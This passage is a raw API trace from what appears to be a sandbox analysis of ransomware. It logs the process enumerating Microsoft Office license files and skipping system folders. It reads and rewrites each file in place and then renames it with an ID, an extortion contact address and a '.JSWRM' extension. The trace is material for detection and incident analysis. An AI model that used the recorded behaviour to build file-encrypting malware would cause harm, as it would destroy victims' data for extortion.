[0106.043] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpString2="...") returned 1 [0106.043] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpString2="windows") returned -1 [0106.043] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.043] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.043] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.043] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.043] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.043] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0106.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0106.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0106.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0106.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0106.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0106.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0106.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0106.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0106.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0106.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.044] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23843) returned 1 [0106.044] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5d20) returned 0x24c1d0 [0106.044] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5d20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5d20, lpOverlapped=0x0) returned 1 [0106.048] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.048] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5d20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5d20, lpOverlapped=0x0) returned 1 [0106.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.049] CloseHandle (hObject=0x45c) returned 1 [0106.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0106.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0106.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0106.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0106.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0106.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0106.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.049] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0106.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0106.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0106.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.050] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7450ad3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7450ad3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe753591e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d87, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", cAlternateFileName="O3FC22~1.XRM")) returned 1 [0106.050] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.050] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.050] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.050] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.050] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.050] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.050] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.050] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.050] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.050] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0106.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0106.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0106.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0106.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0106.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0106.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0106.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0106.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0106.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.051] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11655) returned 1 [0106.051] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0106.051] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0106.054] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.054] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0106.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.054] CloseHandle (hObject=0x45c) returned 1 [0106.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0106.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0106.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0106.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0106.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0106.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0106.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.054] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0106.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0106.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0106.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.055] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe742a8a9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe742a8a9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe75a7fd0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial3-pl.xrm-ms", cAlternateFileName="O3835B~1.XRM")) returned 1 [0106.055] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpString2=".") returned 1 [0106.055] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpString2="..") returned 1 [0106.055] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpString2="...") returned 1 [0106.055] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpString2="windows") returned -1 [0106.055] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpString2="recovery") returned -1 [0106.055] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.055] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.055] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.056] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.056] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpString2="msocache") returned 1 [0106.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0106.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0106.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0106.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0106.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0106.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0106.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0106.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0106.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0106.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0106.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0106.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.056] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0106.057] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0106.057] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0106.059] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.059] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0106.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.059] CloseHandle (hObject=0x45c) returned 1 [0106.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0106.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0106.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0106.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0106.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0106.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0106.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.060] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program 